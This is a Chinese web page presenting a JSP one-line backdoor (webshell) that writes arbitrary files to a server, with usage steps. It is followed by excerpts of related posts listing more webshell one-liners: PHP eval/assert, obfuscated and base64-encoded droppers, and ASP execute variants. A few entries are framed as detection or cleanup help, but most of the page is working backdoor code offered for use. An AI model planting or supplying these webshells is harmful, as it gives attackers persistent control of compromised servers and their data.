JSP一句话后门

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

使用方法:
提交url!
jsp?f=1.txt" target="_blank">http://www.whitehouse.net.cn/1.jsp?f=1.txt&t=HelloWorld

然后:http://www.whitehouse.net.cn/1.txt 就出来了 内容为 HelloWorld

(0)

相关推荐

  • JSP一句话后门

    <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 使用方法: 提交url! jsp?f=1.txt" targ

  • 整理的比较全的一句话后门代码(方面大家查找后门)

    最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: <?php $a = str_replace(x,"","axsxxsxexrxxt"); $a($_POST["c"]); ?> 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 <%

  • JSP一句话木马代码

    复制代码 代码如下: <%  if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());  %> 这个 后门估计不用我说了吧.还是提示一下咯.保

  • 用php实现批量查询清除一句话后门的代码

    总是忘记一句话放到哪个文件里去了,直接全部干掉... 复制代码 代码如下: <?//xy7  if (!isset($dir) or empty($dir)) {  $dir=str_replace('\\','/',dirname(__FILE__));  echo "<font color=\"#00688B\">".$dir."</font>";  } else {  $dir=$_GET['dir'];  e

  • 慎用preg_replace危险的/e修饰符(一句话后门常用)

    preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后).提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误

  • PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

    今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /

  • 各种一句话木马大全

    <%eval request("c")%> <%execute request("c")%> <%execute(request("c"))%> <%ExecuteGlobal request("sb")%> %><%Eval(Request(chr(35)))%><% <%if request ("c")<>&quo

  • 几种另类的ASP后门

    <%  'code by netpatch dim dbfile,sql  db="netpatch.asp" dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")  ydb.Create "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbfile  set ydb=nothing  if er

  • 新型ASP后门源代码分析

    本是为了逃LAKER2兄 查ASP木马程序的  现在已经挑战成功,已经加为检查对象了.公布出代码给冰点的朋友使使,希望大家喜欢! 利用的是ADOX.Catalog组件 复制代码 代码如下: <%    'code by netpatch   dim dbfile,sql    db="netpatch.asp"   dbfile=server.MapPath(db) set ydb=server.CreateObject("ADOX.Catalog")   

  • 教你识别简单的免查杀PHP后门

    一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _

随机推荐